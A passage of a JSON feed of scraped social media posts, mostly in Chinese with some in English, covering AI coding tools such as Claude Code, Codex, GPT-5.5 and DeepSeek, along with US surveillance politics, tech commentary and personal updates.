工程负责人 Sid Bidasaria 在视频里讲了三个分水岭\n1️⃣ Claude Code 可以无界面跑 不用打开聊天框,直接在终端、bash 脚本、CI/CD 里调用 \n\n一行 claude -p \"你的 prompt\" 就能一次性跑完 还能管道串联 cat error.log | claude -p \"找出原因\" 这种,咖啡还没泡好答案就出来了\n\n2️⃣ GitHub Action 60 秒上线 传统 AI 自动化要的服务器、部署管道、监控、认证、成本管理 \n\nGitHub Action 一个都不要 claude /install github action 一键生成 YAML 直接跑 每月 $200 的那堆订阅工具,打不过这一个免费 Action\n\n3️⃣ 三层架构是真正的分水岭 SDK 是底层裸调用 Base Action 是包成干净 \n\nAPI 的中间层 PR Action 是评论、格式化、UI 全套的应用层\n\n- 照教程复制粘贴的人,停在第一层 \n\n- 能帮客户做定制化 AI 基础设施的人,理解的是三层全貌\n\n $5K-$25K 的客单差距就长在这里\n\n实际跑起来能做什么?\n- 自动 code review \n- 自动 bug 分诊 \n- issue 写好之后,AI 自己出 PR(有人提需求 → 自动写代码 → 自动提交,全程没人碰键盘) \n- 初级工程师的活,被压缩成「写清楚 issue 的时间」\n\n最容易被忽略但最值钱的两个细节 \n1️⃣ 权限:默认禁止破坏性操作,--allowed-tools 白名单只允许它做你指定的事 \n\n2️⃣ 会话:每次调用返回 session ID,可以跨几小时、几天、跨部署继续对话 \n\n这两条决定了能不能放进生产环境,也决定了客户付不付钱\n\n英文圈这套打法已经在跑,中文圈大部分人还在聊天框里手动 Claude 信息差就在这 30 分钟里", + "url": "https://x.com/GoSailGlobal/status/2050195755936448705", + "published_at": "2026-05-01T12:48:53+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: This is remarkable and you should watch this entire video.\n\nThe House was going to pass a 45 day extension of FISA 702 (Foreign Intelligence Surveillance Act), BY VOICE WITHOUT VOTING, and Thomas Massie courageously forced a debate and demanded a recorded vote.\n\nJim Jordan who has fought FOR warrants for FISA for years ironically led the debate AGAINST warrants and urged a YES vote for a clean extension WITHOUT warrants, which is what Trump is demanding even after FISA was used against him by the Democrats to spy on him and his campaign. Trump literally says give up your rights and just pass it and Jordan won’t go against Trump even though he wants warrant requirements. \n\nChip Roy, Warren Davidson, and Keith Self joined Thomas Massie and made strong cases as to why Congress must add warrant requirements to FISA 702 and why a Central Bank Digital Currency must be banned and how both are powerful tools of control and surveillance and violation of your privacy and liberties. \n\nAnd Jamie Raskin (D) gave compelling arguments as to why bipartisanship is needed in the House to make reforms to FISA 702 yet after doing so he voted YES to a clean 45 day extension of FISA 702 without warrant requirements, which makes no sense. Why demand change and then literally vote for what you just argued against? However never forget under Biden and Democrats FISA 702 was used to spy on hundreds of thousands of Americans. \n\nAlso, the Republican controlled Senate and its leader John Thune will not vote for a ban on Central Bank Digital Currency, saying it’s dead on arrival in the Senate. And neither will the Democrats.\n\nTo sum it up, Americans are literally losing our precious privacy and freedoms right now under Trump and Republicans, yet Democrats are no better and have made no major policy changes that caused them to lose in 2024. They are only winning because Trump and Republicans have betrayed the most important campaign promises.\n\n111 members of Congress voted NAY (NO) to the 45 day FISA 702 extension without warrant requirements for Americans so that your government can spy on you. Some voted NO in a partisan manner and because they hate Trump and some voted NO because they truly want change.\n\nEither way, those who voted NO should be recognized.\n\nOut of 111 ONLY 26 Republicans bravely voted NO. Here is the list of GOP NOs and pictured is the full list of both D’s and R’s who voted NO.\n\nRepublican NO votes:\nBegich, Biggs (SC), Boebert, Brecheen, Burchett, Cammack, Cloud, Collins, Crane, Davidson, Downing, Fry, Fulcher, Gosar, Hageman, Harshbarger, Higgins (LA), Kennedy (UT), Luttrell, Massie, Miller (IL), Ogles, Perry, Roy, Self, and Tiffany.\n\nBut after all this, the House passed the clean 45 day extension of FISA 702. After years of Trump and Republicans campaigning and demanding on Fox News that warrant requirements must be added to FISA, nothing changed.\n\nThe promises they made to you are broken.\n\nThe only thing that matters is voting records, none of their words. Words are meaningless puffs of air.\n\nIf your Representative is not on this list, who voted NO, then you should tell them you are withdrawing your support and not voting for them. On both sides of the aisle.\n\nIt doesn’t matter anymore whether you vote Republican or Democrat.\n\nBehind the veil, they are one and the same.\n\nLastly, KY-4 your Representative Thomas Massie is a giant among men in Congress and fights for you harder than the entire House and Senate combined. \n\nDon’t be fools, vote for Thomas Massie!!!", + "url": "https://x.com/paulg/status/2050193715063300532", + "published_at": "2026-05-01T12:40:47+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "大部分人的 RAG 系统,只检索一次就完事了——这可能是你效果上不去的最大原因。\n\nvia @omarsar0 这条帖子讲的是「推理过程中什么时候该去检索」,AI 开发者建议收藏。\n\n核心观点拆解:\n\n1️⃣ 多数 RAG 系统的做法是:用户提问 → 检索一次 → 丢给模型生成答案。一锤子买卖,检索质量不够,后面全白搭。\n\n2️⃣ 更好的思路是在推理过程中动态触发检索——模型推到一半发现信息不够,再去拿一轮上下文,而不是开头一把梭。\n\n3️⃣ 这背后的逻辑是:复杂问题往往需要多跳推理,第一次检索拿到的文档不一定能覆盖所有子问题,中途补检索才能让推理链不断链。\n\n4️⃣ 这也是当前 Agentic RAG 的核心方向之一:让模型自己决定「什么时候需要更多信息」,而不是流程写死只检索一次。\n\n5️⃣ 实际落地时要权衡延迟和成本——每多一次检索就多一轮调用,需要根据场景判断是一次检索够用,还是值得多轮迭代。\n\n对小白的意义:如果你在搭 RAG 管线,别只盯着 embedding 模型和 chunk 策略调参,先问自己一个问题——你的系统在推理过程中,有没有「回头再查一次」的能力?这一步的有无,可能比换模型影响更大。", + "url": "https://x.com/GoSailGlobal/status/2050191775881736409", + "published_at": "2026-05-01T12:33:04+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "牛逼,今天刷到一篇帖子,然后成功用这个方法双开了微信👇\n\n只需要将这段话发给Codex:\n\n使用该项目 https://github.com/mcncarl/yichen-skills/tree/main/mac-wechat-dual-open 帮我安装微信双开。把它的图标换成蓝色。", + "url": "https://x.com/Pluvio9yte/status/2050189794324713656", + "published_at": "2026-05-01T12:25:12+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "孙割是真割啊\n\n我是懒得去试\n\n积分额度随便调,背后调度可想而知😅", + "url": "https://x.com/GoSailGlobal/status/2050188921665941984", + "published_at": "2026-05-01T12:21:44+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "身体脆弱就会造成精神脆弱\n\n精神脆弱就会导致效率低下", + "url": "https://x.com/lxfater/status/2050188888744804410", + "published_at": "2026-05-01T12:21:36+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "Gemini会员每个月能领谷歌云额度,别忘啦,Pro10美金/月,Ultra100美金/月\n\n一次有效期一年,用不到就先攒着吧😄\n\nhttps://me.developers.google.com/benefits?hl=zh-cn", + "url": "https://x.com/gkxspace/status/2050183561316016186", + "published_at": "2026-05-01T12:00:26+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "RT by @liuliu: 浏览器里跑 ASR 真的不是梦,一个完全没做啥优化的版本就能做到很高的准确率和推理速度了,估计我能优化到 0.04 这个速度(浏览器识别1秒音频需要 0.04秒时间)", + "url": "https://x.com/liuliu/status/2050177096505561140", + "published_at": "2026-05-01T11:34:44+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: I am very saddened by the news that Martijn van der Vorm has passed away.\n\nIt is safe to say that, without Martijn, The Ocean Cleanup wouldn’t be where it is today, or perhaps wouldn’t be here at all. He was one of the first people to support us in a major way. It was also he who drew my attention to the extreme plastic pollution of Guatemala’s Motagua River and subsequently funded us to address it.\n\nI’ve never met anyone quite like Martijn. The obituaries focus on how he avoided the limelight and lived modestly, and that’s all true (I once bumped into him while we were both standing in line to board economy class.) But this undersells his other qualities, such as his mental acuity and how involved he was.\n\nHe had the ability to understand things at the deepest level and then put his finger on the weak spot in the plan you presented. But he did so in a way that energized you rather than disheartened you. Every meeting I had with him, I left with more energy than I entered with. And it didn’t stop there. He would keep thinking about it and then call me weeks later with more questions. More ideas. I’ll miss that a lot.\n\nI feel slightly uncomfortable writing all this, because Martijn never wanted credit for the things he did, all the people and projects he helped. But if anyone deserves it, it’s him.\n\nOn behalf of the entire team:
Thank you, Martijn.", + "url": "https://x.com/paulg/status/2050173178689749188", + "published_at": "2026-05-01T11:19:10+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I am sorry but work from home Friday is a 4-day work week. Even worse when the Friday is a sunny Friday. \n\nBack to the office. 996.", + "url": "https://x.com/HarryStebbings/status/2050166710645268939", + "published_at": "2026-05-01T10:53:28+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned. \n\nIt's really as simple as that.\n\nThey want to take away your right to choose, and take away businesses' rights to fine tune and make your products cheaper and better.\n\nThe end state here, if we let these short-sighted people win, is a horrible place for America:\n\nThey will look to ban Chinese models under the guise of national security grounds and conveniently leave only proprietary American companies standing in the USA. The only real \"attack\" happening is closed source companies attacking open source the same way Microsoft once tried to attack Linux to create regulatory capture.\n\nIf you can't win in the market, win in Washington is their strategy.\n\nDo not be fooled by this regulatory capture and saber rattling nonsense. It's a bait and switch. \n\nThe goal is to rob you of choice. That's it.\n\nThese short sighted policies will make America weaker, not stronger.\n\nThese are the very folks whose shoot-us-in-the-foot policies lost NVIDIA 100% of the market share in China, driving it to basically 0%, while kickstarting the moribund Chinese chip ecosystem. It was dead in the water, and now it's awakened from its deep slumbers. Old state sponsored dinosaurs are reborn as emerging chip powerhouses.\n\nThe demand for Chinese chips is accelerating and it will only get stronger. \n\nWhen Jensen is proven right a few years from now (he's the best long term thinker in business today) and you have hundreds of cheap Chinese models running optimized on Chinese chips and those models are now hard to run on NVIDIA hardware you can thank these folks.\n\nIf you're banned in the USA from using these models and these chips, do you think the rest of the world will be? \n\nNope. \n\nThey'll happily adopt the cheaper, faster, good enough models that we kickstarted with our short-sightedness. 1 billion people in the west will be banned and using closed/gated/sluggish/censored/surveilled models that destroy your privacy while 6 billion other people use the now dominant Chinese ecosystem and your NVIDIA retirement shares lose money.\n\nWhen you can't use open source anymore because it gets banned for Americans, you can thank these short-sighted, foolish folks.\n\nWhen your API bills is a billion dollars and burns your budget in three months instead of 12, you can thank these folks.\n\nWhen all your personal intimate, personal data flows threw a few tight gateways and choke points mandated by law, you can thank these folks.", + "url": "https://x.com/ylecun/status/2050162348891979817", + "published_at": "2026-05-01T10:36:08+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning.", + "url": "https://x.com/pmarca/status/2050157073883902069", + "published_at": "2026-05-01T10:15:11+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Co-sign.", + "url": "https://x.com/pmarca/status/2050155852460675379", + "published_at": "2026-05-01T10:10:19+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "GPT 5.5 可以通过设定目标和指标\n\n自行迭代优化🔁", + "url": "https://x.com/GoSailGlobal/status/2050154742480040440", + "published_at": "2026-05-01T10:05:55+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "RT by @CuiMao: I LOVE Deepseek-v4-flash, incredibly reliable and capable, logical. It's lacking in frontend but I have MiMo for that. \n\nI would recommend any company spending 100k+ a year on AI to purchase 8-10~ 6000s and have a few of the works to have them blind test these models for work.", + "url": "https://x.com/CuiMao/status/2050145968553709999", + "published_at": "2026-05-01T09:31:03+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "RT by @pmarca: A great summary of the 21st century so far", + "url": "https://x.com/pmarca/status/2050143545525211213", + "published_at": "2026-05-01T09:21:25+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "那些餐饮店的饮料还以为是做慈善\n原来进货价就1毛钱一瓶水实测可以买很多瓶\n自己有多少个号买多少个号,应该不是敌敌畏\n0.1🉐百花蜂蜜500g\nhttps://u.jd.com/fOY2tiP\n0.1🉐弱碱苏打水300ml*1瓶\nhttps://u.jd.com/fgYnQ2p\n0.1🉐金银花罗汉果茶360ml*1瓶\nhttps://u.jd.com/fOYTQzZ\n0.1🉐百合绿豆水400ml*1瓶\nhttps://u.jd.com/f6YpRFx", + "url": "https://x.com/realNyarime/status/2050142432088526883", + "published_at": "2026-05-01T09:17:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "北京环球影城!✌️", + "url": "https://x.com/CuiMao/status/2050142119604691422", + "published_at": "2026-05-01T09:15:45+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "这个音频组件库做得太完美了。\n\nhttps://audio.raphaelsalaja.com/", + "url": "https://x.com/dingyi/status/2050137408268886450", + "published_at": "2026-05-01T08:57:02+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "从昨天开始有不少网友反馈iOS推送异常,原因未知\n在对 http://push.apple.com 分流后仍无法接到Telegram等App推送,切换外区Apple ID后恢复,但CN直连失败\n\n这是Apple自App Store对中国大陆IP重定向至/cn(国区商店)后,进一步限制移动端设备推送,暂不影响macOS", + "url": "https://x.com/realNyarime/status/2050136980454031800", + "published_at": "2026-05-01T08:55:20+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "On Project Fear.", + "url": "https://x.com/pmarca/status/2050135501550883051", + "published_at": "2026-05-01T08:49:27+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "…", + "url": "https://x.com/pmarca/status/2050135309053276499", + "published_at": "2026-05-01T08:48:42+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "…", + "url": "https://x.com/pmarca/status/2050134937396007224", + "published_at": "2026-05-01T08:47:13+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending.", + "url": "https://x.com/pmarca/status/2050132661348561361", + "published_at": "2026-05-01T08:38:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "I remember that moral panic too! And the one before that, when the Anarchist’s Cookbook was being [shudder] photocopied.", + "url": "https://x.com/pmarca/status/2050131426499301840", + "published_at": "2026-05-01T08:33:16+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "“Jack Valenti [then head of the film industry’s MPAA] famously told a congressional panel in 1982, ‘I say to you that the VCR is to the American film producer and the American public as the Boston Strangler is to the woman home alone.’”", + "url": "https://x.com/pmarca/status/2050131011095404902", + "published_at": "2026-05-01T08:31:37+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "贵州牛肉粉 3u", + "url": "https://x.com/0xAA_Science/status/2050129079677145442", + "published_at": "2026-05-01T08:23:56+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Anthropic 这招真狠,所有 Claude Code 用户都该看一眼。\n\n@theo 做了个最干净的实验:\n建一个空 Git 仓库,commit 只放一行 JSON:\n\n{\"schema\": \"openclaw.inbound_meta.v1\"}\n\n调用官方 Claude Code —— 直接报错\"out of extra usage\"。\n要么拒绝请求,要么强制多收一份钱。\n\n0 行业务代码,只因为那一行 JSON 里有 OpenClaw 这个单词。\n\n模型在卷开源,工具会不会开始卷封闭?", + "url": "https://x.com/runes_leo/status/2050127414630469937", + "published_at": "2026-05-01T08:17:19+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The same will be true of “because of AI”.", + "url": "https://x.com/pmarca/status/2050127365930729486", + "published_at": "2026-05-01T08:17:08+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Image", + "url": "https://x.com/pmarca/status/2050127137898922384", + "published_at": "2026-05-01T08:16:13+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Every argument of “because of the smartphone” or “the Internet” or “social media” is cope, to avoid confronting the catastrophic collapse of incumbent institutional competence over the same timeframe.", + "url": "https://x.com/pmarca/status/2050126879982805379", + "published_at": "2026-05-01T08:15:12+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Ooh.", + "url": "https://x.com/pmarca/status/2050123904849699053", + "published_at": "2026-05-01T08:03:23+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "R to @pmarca: Credit @qorprate", + "url": "https://x.com/pmarca/status/2050123454373048716", + "published_at": "2026-05-01T08:01:35+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "And yet we write.", + "url": "https://x.com/pmarca/status/2050122286603321365", + "published_at": "2026-05-01T07:56:57+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Spotify真的挺有意思的\n\n为人类艺术家打上了“验证”标签\n\n是不是太多AI生成了。\n\n看来AI Generate的标识已经打不过来,甚至分辨不出来了", + "url": "https://x.com/GoSailGlobal/status/2050121466021363878", + "published_at": "2026-05-01T07:53:41+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Ooh.", + "url": "https://x.com/pmarca/status/2050120872309264725", + "published_at": "2026-05-01T07:51:20+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Ooh.", + "url": "https://x.com/pmarca/status/2050120321399951771", + "published_at": "2026-05-01T07:49:08+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "OpenAI 要分家了\n\n山姆(Sam)醉酒发推\n\nGitHub 要完蛋了\n\nAnthropic 还是老样子\n\n播客也挺难的,支持一下", + "url": "https://x.com/GoSailGlobal/status/2050120304203317373", + "published_at": "2026-05-01T07:49:04+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Dragoncode群友也分享了一下设计的聚合站,我目前做的产品都是在这里面直接拿设计风格\n\nhttps://getdesign.md", + "url": "https://x.com/bozhou_ai/status/2050119556644171998", + "published_at": "2026-05-01T07:46:06+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "⏺ OpenAI 官方发了一份 GPT-5.5 的 Prompt 编写指南,核心观点一句话概括:别再写又臭又长的 Prompt 了,告诉模型你要什么结果就行。\n\n这份指南的思路挺有意思。以前大家写 Prompt 的习惯是\"手把手教\":先做A,再做B,然后比较C。\n\n现在 OpenAI 官方的建议是:描述终点,而不是规定路线。\n\n几个值得注意的点:\n\n1. Outcome-First(结果导向):\n\n不要写一堆步骤让模型按顺序执行,而是描述\"成功是什么样的\",让模型自己决定怎么走。翻译成人话:以前是写\nSOP,现在是写验收标准。\n\n2. 停止条件(Stopping Conditions):\n\n给模型加一个明确的\"能不能回答了?\"的判断规则,防止它无限循环地查资料、做推理。这个在 Agent\n场景下尤其重要——很多 Agent 跑飞了就是因为没有好的停止条件。\n\n3. 自我检查(Self-Checking):\n\n写完代码跑测试、做完 UI 截图看一眼、做计划要可追溯。这不就是软件工程的基本功吗?\n\n4. 搜索预算(Grounding):\n\n给模型设定搜索的\"停止规则\"——搜到能回答问题的信息就停,别为了润色措辞再去搜一轮。\n\n5. 创意内容和事实分开:\n\n检索到的事实用来支撑具体的数据和声明,创意部分不要编造具体数字和指标。\n\n这份指南还提到了一个 text.verbosity 参数,可以控制输出的详细程度,默认是 medium,设成 low 可以让输出更简洁。做 API 开发的可以关注一下。\n\n说说我的看法:\n\n这份指南看着在讲 Prompt 技巧,底下的逻辑其实是 Harness Engineering。停止条件、验证循环、搜索预算,这些都不是 Prompt本身的问题,而是围绕模型的工程系统设计。\n\n另一个有意思的转变:\n以前写 Prompt 像写代码,要精确控制每一步;现在更像写需求文档,描述清楚\"要什么\"和\"什么算完成\"就行。这和 Agentic Engineering的大方向是一致的——你不需要控制 Agent 的每一步,而是设定好目标和边界。\n\n不过有一点要注意:这份指南是针对 GPT-5.5 的。不同模型对 Prompt 风格的偏好不一样,Claude 和 GPT 在这方面会有明显差异。", + "url": "https://x.com/Pluvio9yte/status/2050118179062743418", + "published_at": "2026-05-01T07:40:37+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "这几周 Codex 常驻电脑,已经很久没有打开 ChatGPT 了。\n\n推荐一下插件和自动化,很上头。", + "url": "https://x.com/frxiaobei/status/2050116811769954778", + "published_at": "2026-05-01T07:35:11+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "新时代的设计灵感聚合站,应该长这样。把网站的设计样式都变成了 design.md\n\nhttps://styles.refero.design/", + "url": "https://x.com/dingyi/status/2050109458957947150", + "published_at": "2026-05-01T07:05:58+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "小米之家河南限定五一礼物钧瓷已拿到\n还送了水和王者明信片,汝窑会更好看,天青色\n\n对了,其实周杰伦的青花瓷这首歌最初写词是写的汝瓷\n不知道为啥换名字了\n\n青花瓷是靛蓝或者宝石蓝,不是天青色", + "url": "https://x.com/realNyarime/status/2050108592246984780", + "published_at": "2026-05-01T07:02:32+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "跟推友问好👋\n\n有一个问题想问大家🙋\n\n放假都没出去,看了一圈好像没什么好玩的地方🤔\n\n所以想问问,有什么值得两人旅行的地方?😳", + "url": "https://x.com/realNyarime/status/2050101082433720730", + "published_at": "2026-05-01T06:32:41+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Karpathy 这场 Sequoia 演讲把 AI 编程下个阶段讲透了,最有感触的是第 6 条。\n\n1. Software 3.0 来了。\n1.0 写代码,2.0 训神经网络,3.0 在 LLM 的 context 里用自然语言\"编程\"。\n\n2. 2025-12 是拐点。\n生成代码块变大变连贯,编程的最小单位从\"写代码\"升级到\"委派任务\"。\n\n3. 神经网络会成主计算层。\n未来不是 CPU 上跑神经网络,是神经网络当主进程,传统计算变辅助。\n\n4. 许多应用会消失。\n用户不需应用,直接拿模型输出。MenuGen 那种轻量工具最先被替代。\n\n5. 验证性决定进展速度。\n数学、代码这种可结算的领域 AI 飞快。模糊任务仍是\"锯齿智能\"。\n\n6. 新的 10x 工程师不是会写代码的人。\n是会做这五件事的人——\n\n规范 / 监督 / 审查 / 评估 / 权限管理。\n\n没一件是写代码本身。\n\n7. 它们是鬼,不是动物。\nLLM 是统计模拟物,盲信和盲拒都不对,要实证理解它的边界。\n\n最强金句:\n\n> 你可以外包思考。\n> 但不能外包理解。\n\n---\n\n跑了半年策略,第 6 条最有体感。\n\n写新策略丢 prompt 给 Claude Code 就有了。\n真正花时间的是规范怎么写、跑出来怎么审、上线前权限怎么收。\n\n代码量从 0 到 1 的那段不再是瓶颈。\n从 1 到能信任的那段才是。\n\n---\n\n鬼,不是动物。\n盲信和盲拒都不对。", + "url": "https://x.com/runes_leo/status/2050096487967695197", + "published_at": "2026-05-01T06:14:26+00:00", + "source": "nitter", + "title_zh": "专家强调LLM本质为统计模型,需通过安全边界测试验证其可靠性,开发决策中平衡模型应用与人类认知边界" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "硅谷101 这期 DeepSeek,我反复看了 3 遍\n\n陈茜也转发了我的推文\n\n3 个细节没人注意到,但对我们做出海/独立开发的影响最大:\n\n1️⃣ DeepSeek 全员 ~150 人,正面打 OpenAI 1000+\n\n出海产品从来不是\"等团队够大\",是\"敢做\"\n\n我 1 个人 3 个月上了 4 个出海工具,靠的就是 Cursor + DeepSeek API + 不内耗\n\n2️⃣ 幻方 7 年量化背景,把\"模型上线 → A/B → 不行就删\"做成了肌肉记忆\n\n3 周一次大版本,迭代速度是 OpenAI 的 3 倍\n\n独立开发者天然就该这么干,但 90% 的人在第 2 周就开始打磨 UI 细节,全错\n\n3️⃣ 梁文锋几乎 0 媒体露面、0 KOL 投放\n\n靠的是产品 → 用户口碑 → X 自传播\n\n我基本每天起码保持日更,维持手感,\"做不出爆款是因为没渠道\" 是骗自己", + "url": "https://x.com/GoSailGlobal/status/2050092401004564952", + "published_at": "2026-05-01T05:58:11+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "目前已经有4位伙伴提交了作品,挺有意思的,都是一些小工具,估计就一两个小时就完成了", + "url": "https://x.com/bozhou_ai/status/2050092103565496369", + "published_at": "2026-05-01T05:57:01+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "避雷一下中国电信英国(CTExcel UK)\n虽然补卡费用30块(3英镑),但为了恶心你一下增加了库存机制\n头一次听到补eSIM还能有“库存”这一说法的,这eSIM又不是实体卡,居然还能补卡卡池库存不足🤣🤣🤣", + "url": "https://x.com/realNyarime/status/2050088491925815667", + "published_at": "2026-05-01T05:42:39+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Sky's special correspondent @AlexCrawfordSky reports on the dozens of villages in southern Lebanon which have been virtually wiped out by Israel in a matter of weeks", + "url": "https://x.com/paulg/status/2050084092402688337", + "published_at": "2026-05-01T05:25:11+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "x.com/i/article/204974561199…", + "url": "https://x.com/GoSailGlobal/status/2050076357296824737", + "published_at": "2026-05-01T04:54:26+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "今天看了 @GabiExplores 的两个项目:\n\nstitch-kit · 22 ★ · Google Stitch MCP 完整设计 pipeline,35 skill / 5 层架构,覆盖 6 个 agent 平台\n\nslopbuster · 2 ★ · AI 文本去痕迹,含市面上唯一的 code 去 AI 味(comment / commit / naming),引用 4 篇 LLM 检测论文\n\n工程量:扎实。GitHub stars 加起来 24,X 关注 4。\n\n同期对比:obra/superpowers 173K,garrytan/gstack 86K,mattpocock 42K。\n\n差 1700-7000 倍。差距不是质量,是 distribution。\n\n蓝皮书 Ch3 「shipping easy, distribution hard」每天都在被印证:https://github.com/zhuyansen/skill-blue-book/blob/main/part1-foundation/ch03-market-landscape.md\n\n🔗 http://github.com/gabelul/stitch-kit\n🔗 http://github.com/gabelul/slopbuster", + "url": "https://x.com/GoSailGlobal/status/2050075607707586658", + "published_at": "2026-05-01T04:51:28+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "⏺ Sam Altman 这段话说得挺实在的:AI 的下一个大突破不是某个具体领域,而是人们意识到自己每天在电脑上浪费了多少时间。\n\n简单说,大家以为 AI 的价值是\"帮你把某件事做得更好\",但 Altman认为真正的价值是\"帮你省掉那些根本不该做的事\"——在应用之间切换、复制粘贴、处理各种数字杂务。这些摩擦看着不起眼,但确实在不断打断心流。\n\n这个观点我是认同的。说说自己的体验:\n\n1. 以前写一篇翻译稿,光是在浏览器、编辑器、翻译工具之间来回切换就要耗掉不少精力。现在直接在 Claude Code 里一条龙搞定,中间那些摩擦几乎消失了。\n2. 以前整理一个项目的技术文档,要打开十几个文件逐个看。现在让 Agent 自己去读代码、生成文档,我只负责审核。\n\n这些不是什么\"颠覆性\"的变化,但每天确实能省出不少心流时间。\n\n不过有一点要注意:Altman 说\"大多数人可以放松下来看着 AI完成枯燥工作\",这个对程序员和重度工具用户来说已经在发生了,但对很多传统行业的人来说,光是\"怎么把工作交给 AI\"这件事本身就是一个不小的学习成本。\n\n翻译成人话:不是 AI 不够强,是大多数人的工作流还没有为 AI 准备好。这其实就是 Harness的问题——模型能力到了,但围绕模型的工作环境(工具链、权限、数据接入)还没跟上。\n\n所以 Altman 这个判断方向是对的,但真正落地可能比他说的要慢一些。至少目前,能真正享受到\"心流不被打断\"的,还是少数已经把 AI 深度嵌入工作流的人。", + "url": "https://x.com/Pluvio9yte/status/2050072657618772226", + "published_at": 